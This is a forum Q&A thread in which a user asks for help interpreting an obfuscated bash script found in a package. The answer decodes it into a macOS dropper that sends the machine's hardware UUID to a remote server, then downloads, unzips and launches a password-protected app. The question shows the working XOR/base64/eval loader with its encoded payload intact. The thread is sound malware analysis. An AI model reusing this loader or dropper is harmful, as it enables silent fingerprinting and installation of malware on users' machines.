Tags: bash, eval, obfuscation

Suspicious bash code: who can help me interpret it?


While unpacking a package I found a piece of code. Because I am not good at bash I don't know what to do with it, but I suspect it is malicious code. Who can help me interpret it?

#!/bin/bash
# _l: XOR two hex strings byte by byte; the second one (the key) wraps around when it runs out
_l() {
    _i=0;_x=0;
    for ((_i=0; _i<${#1}; _i+=2)) do
        # take one hex byte of the data, XOR it with the current hex byte of the key, append the result as two hex digits
        __return_var="$__return_var$(printf "%02x" $(( ((0x${1:$_i:2})) ^ ((0x${2:$_x:2})) )) )"
        # advance the key offset and restart from the beginning of the key when it is exhausted
        if (( (_x+=2)>=${#2} )); then ((_x=0)); fi
    done
    # return the result through the variable named in $3, or print it when no name was given
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}

# _m: base64-decode $1 (which yields a hex string), hex-encode the key $2, XOR the two with _l,
# then convert the resulting hex back into bytes (xxd -r -p)
_m() {
    _v=$(base64 --decode <(printf "$1"));_k=$(xxd -pu <(printf "$2"));
    __return_var="$(xxd -r -p <(_l "$_v" "$_k"))"
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}
# the XOR key; its ASCII bytes are what get XORed against the hidden script
_y="8903139122"
# the hidden script: XORed with the key, hex-encoded, then base64-encoded
_t="MWIxODFmNTE1ODVkMTY1MzUzNDE1MDE5M2EzOTc0N2Q3YTZlNjI3MzZiNmEwZDExMDkwYTA5MDIwMzAxMDEwODAyMDExMzM5Nzg2MTYyNmQ3Yzc2N2Q3Mjc4N2QwNDEzNDU0NTRmMTc1MTVlNTI1YTU3MWY0MTQyNTk1YTU1MTEzYjcyNjk2MTZkNjA3NzZjNjQ3NjBjMTE1ZDVlNDU1YzU0NTY1MTU3MWU1NzU1NDI0NjEwMzI0YzVlNDk1ODQzNjY0MTUzNDE0YjRlNWY0MTU1MGUxYjAzMDAwMzAxMGEwMTAwMDEwYTAxMDkwYjAyMGIwODAzMGEwMDAxMGIwODEwMzgzMjU2NDM2YzQ3NTY0YjQyNWI1ZDU2MDQxMjE3MTk0MDRlNmU0NDU3NGE0YTEwMWU0MTQxNTY1NTQ3NTE0YzZmNTU0MTQyNWE1NjVmMWIxMDE4MzM0MzU2NDI0MDUwNWU1YzZkNWY0YzU5NTcwYzExMWQxOTQ3NDc1MTVkNTc1NjVmMWExYjExMzg1ZjU5NWE1ODVhNWY1NjY2NTg1NjBmMWExZDE4NTY1MjViNTYxMTFmNWMxODFiMTQxYjU4NWM0YjU0NTUxMjE1NGI1NDAyMTExZTVhMTE3YjdkNjg1NTUxNDc1NzVjNGI1Yzc3NGE0ODVjNDI0Nzc1NTY0ZjU4NTE1NzE4NDUxMDU0NDM1NjQ5MTExZjVkMTgxZTEyN2E3ZTYzNTU1MDQ2NTQ1NzRiNWQ2NjY0N2E3ZDEzMTIwZjE4MWI2YzFiMWYxOTY1MTgxMDE1MTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzMxNzFiMTAxYTYzNjcxMjZlMWExYTFiNzE2ZTAzNzg0OTE3MWExMzEzNDUxMTQ2NDAxODE0NTQ1MDExMTQ2MjZhMDg0MjRhNTA1ZTQ3MGI2ZTY0MTYxYjEwMTgzMzNhNDY0MzVmMDQxMzVhNDY0YzQ5MGExYzFlMTc0MjcwNjI2MjY3N2Q3ZjdlNzA3YTc3NGMxZDE2NDM3ODYwNjM2ZTYxNzY2NDY2Nzc0NTA2NWQ1YTU1MGUxZDRhNWY1MzViNTE1OTVkNTQ2YzUwNTU0ZjE0NGIwNDE0NDg0MjU2NGE0MjViNWQ1NjY2NTc0NjU4NTc0NDE3NWQwZjFjNDI1ZjQwNmU0NTVjNDM0MTViNTc1NzRkMTU0MTBlMWQ0YTc3N2M3YjY2NjA3MjYyNjA0NDEzMzg0NjU1NDk2ZjQzNTA0NzUxMGMxMDE2MTA1NDViNDc1NDVlNDkxMTFkNDY1NTQ5MWY2YjY5NmI2MTY5NmE2YTYwNjExOTExM2I1MDRjNDM1ZTEyMTU1ZjAwN2YxMTExMWQ0YTQ3NDA1NDQ0MTIxMzBmMWM1ZDU0NDQxZDU2NGM1YzVmMTEwMTA3MTcwMzEyMDYwNzEwMTc0YTQ3NTQ0MTZkNDI1OTRkNTg0ZTExMzk1ODQxNDI2ZDVjNTA0MjBlMTMxNzExNWM1OTQ2NWQ1NDQwMTMxYzU3MTkxZTQ2NWY0ODE2Njg2YjY5NmI2MTY5NmE2YTExMTYxMjEzM2I0NjU3NGI1YjQyMTgxNDYwMTMxMzE3NDI0NDVjNDg1MTQ5NmY0MzUwNDA0YTQ2NWQ0MDVjNDQxMjEzMTMxNzQyNDU1ZjQyNjc0OTUxNDc1OTRlMWIxMTFmNTYxODFiMTQ0ODUwNDM0OTZlNTY1YjRhNDQxMjEzMGYxMzE2NTU1NzQ0MTc1NzQ1NWY1ZDEzMGIwZjE0MDMxODMzNDI1ZTExMWU1ZjExMTY0OTRjNTQ0MDZjNDE1MjRkNTk0ZjEyMzI1ZjU5NWY1NDZjNTc1MDVmNTcwNTFiMTQxYjU2NDE1YzQxMTIxZjU1MDgxMDFlNDcxMzFiMWIxYzUzNDg0OTEyMTMwZDFiNTU0MjEyMWYwOTE5MTIxNzRhNTI0OTQxNmQ1NjUxNGI0ZDExMTgxYTFiMTEzODQ0NTc1NTQ1NWU1NDZjNTc1MDVmNTcwNTFiMTQxYjU0NTA1MTVlMTIxZjU2MTkxMjE3NGE2MzZlNzU0ZjEwMTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzM2NzE5MWQ2NDU3NTU0NTVlNTQ0MDE2NmE2YzFkNjUxMjE5MWMxZjE5Nzk2ZDAzNzI0ODFlMTkxMTExMzk0ZjVlNWU0NzU1NWM2ZjVkNTA1ZTVjMGMxMDE2NDM0ZjVmNWY0NDVlNWM2ZTVjNTM1NTVjMWYxYzExMWMxYzAzMDI0ZjFhMTkzYTUwNTk1ZTU2NTUxMjE5NDAxOTEyMTc0YTUyNDk0MTZkNTY1MTRiNGQxNzRhNTU1MDVkNTc2ZDU2NTg1ZDU2NGMxYzdhNWU1YzQ2NWQ1NzQ0NDAxZTdlNTg1MjdkNjExYTE2MWExMzNiNWM0OTU0NWMxMjE1NTgxMDExMTU0ODU4NDE0MjZkNWM1MDQyNGUxNTQ4NWY1ODVlNTc2NzU3NTE1ZTU0NGUxYjExMWYxZjU5NGI1NzQwMTExMTRhMTMxMjEwMWM0MjQzNTY0MjQwNTA1ZTVjNmQ1ZjRjNTk1NzRjMTExOTEzMTY0OTRlNTY1YzQ2NWM1NjY2NWY1MzVmNWQ0NDEyMzkK"

# decode the hidden script and execute it straight away
eval "$(_m "$_t" "$_y")"

Solution

  • The two functions at the top, _l() and _m(), read in the two strings _y and _t. _t contains the obfuscated code and _y acts sort of like a key. The key is applied, letter by letter, to the obfuscated code, creating a base64 string that can be decoded into a bash program that the eval command can execute.

    Removing eval and echoing the results like echo "$(_m "$_t" "$_y")" spits out the code that will be executed by the eval command. This is perfectly safe since we aren't actually evaluating the obfuscated code now:

    #!/bin/bash
    
    ENC_PASS=<somepasswordhere>            # redacted by the answerer
    APP_DOMAIN=<somewebsite>               # redacted by the answerer
    APP_ROUTE="download/dlst"
    unzip_password=<anotherpasswordhere>   # redacted by the answerer
    
    # fingerprint the machine: macOS version, a fresh per-run session id, and the hardware UUID read via ioreg
    os_version="$(sw_vers -productVersion)"
    session_guid="$(uuidgen)"
    machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')"
    
    # send the fingerprint to the server as query parameters and save whatever it returns to a temp file
    url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}&s=${session_guid}&o=${os_version}&p=${ENC_PASS}"
    tmp_path="$(mktemp /tmp/XXXXXXXXX)"
    curl -f0L "${url}" >/dev/null 2>&1 >> ${tmp_path}   # stderr is discarded, stdout (the download) lands in tmp_path
    # extract the password-protected zip into a second temp directory, then delete the download
    app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
    unzip -P "${unzip_password}" "${tmp_path}" -d "${app_dir}" > /dev/null 2>&1
    rm -f ${tmp_path}
    # take the first entry of the extracted directory and note which /Volumes/... mount the script was run from
    file_name="$(grep -m1 -v "*.app" <(ls -1 "${app_dir}"))"
    volume_name="$(echo -n "${PWD}" | sed -E -n 's@^(/Volumes/[^/]+)/.*@\1@p')"
    volume_name="${volume_name// /%20}"
    # make the bundle's binaries executable and launch it, passing the session id and volume as arguments
    chmod +x "${app_dir}${file_name}/Contents/MacOS"/*
    open -a "${app_dir}${file_name}" --args "s" "${session_guid}" "${volume_name}"
    

    I would suggest NOT running that. Edited to remove the website and passwords, just in case this obfuscation is done by some very crafty but derelict developer and isn't actually malicious... although this is almost definitely malicious. You can run it without the eval yourself to see the redacted bits.

    At a high level this sends your comp info up to a server and downloads a zip file. The zip file is unzipped, the contents are made executable, and then they are executed. This will only work on Mac due to the MacOS subfolder in the zip (duh), but also because of the use of the ioreg program to collect the data stored in machine_id, which is sent to the remote server.

    Next step is to get that zip and see what it does. I'm not downloading it though ;)
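The decoding that the answer walks through (base64-decode _t to get a hex string, XOR each byte against the repeating ASCII bytes of _y, turn the hex back into bytes) can be reproduced outside bash, which removes any chance of the hidden script reaching eval by accident while you look at it. The following is an added example, not code from the question or the answer: the key 8903139122 is the _y value from the posted script, but the payload it decodes is a harmless sample constructed here with the inverse routine rather than the real _t blob. The real _t string can be passed to deobfuscate() just the same; it returns text and never executes anything.

```python
import base64
import binascii

# _y from the posted script: the XOR key, used as its raw ASCII bytes
KEY = "8903139122"


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Python equivalent of _l(): XOR data byte-for-byte with key, wrapping the key."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def deobfuscate(t: str, y: str = KEY) -> str:
    """Python equivalent of _m(): base64 -> hex text -> XOR with y -> plaintext.

    Returns the hidden script as text; nothing is executed.
    """
    # base64 --decode: the result is a hex string, not raw bytes
    hex_text = base64.b64decode(t).decode("ascii").strip()
    if len(hex_text) % 2:
        raise ValueError("decoded hex text has odd length")
    # xxd -r -p: hex text back to bytes, then the XOR that _l performs
    hidden = binascii.unhexlify(hex_text)
    return xor_with_key(hidden, y.encode("ascii")).decode("utf-8", errors="replace")


def obfuscate(script: str, y: str = KEY) -> str:
    """Inverse of deobfuscate(); used here only to build a constructed sample."""
    hidden = xor_with_key(script.encode("utf-8"), y.encode("ascii"))
    hex_text = binascii.hexlify(hidden).decode("ascii")
    return base64.b64encode(hex_text.encode("ascii")).decode("ascii")


# Constructed sample payload (not the real _t from the question)
SAMPLE_SCRIPT = '#!/bin/bash\necho "constructed sample payload, nothing malicious"\n'
SAMPLE_T = obfuscate(SAMPLE_SCRIPT)


if __name__ == "__main__":
    # Print the hidden script for reading; never hand it to eval or subprocess
    print(deobfuscate(SAMPLE_T))
```

A quick way to confirm the scheme matches the posted loader: obfuscate("#!/bin") yields MWIxODFmNTE1ODVk, which is exactly how the posted _t string begins, so the first six bytes of the hidden script decode to the #!/bin of a shebang line.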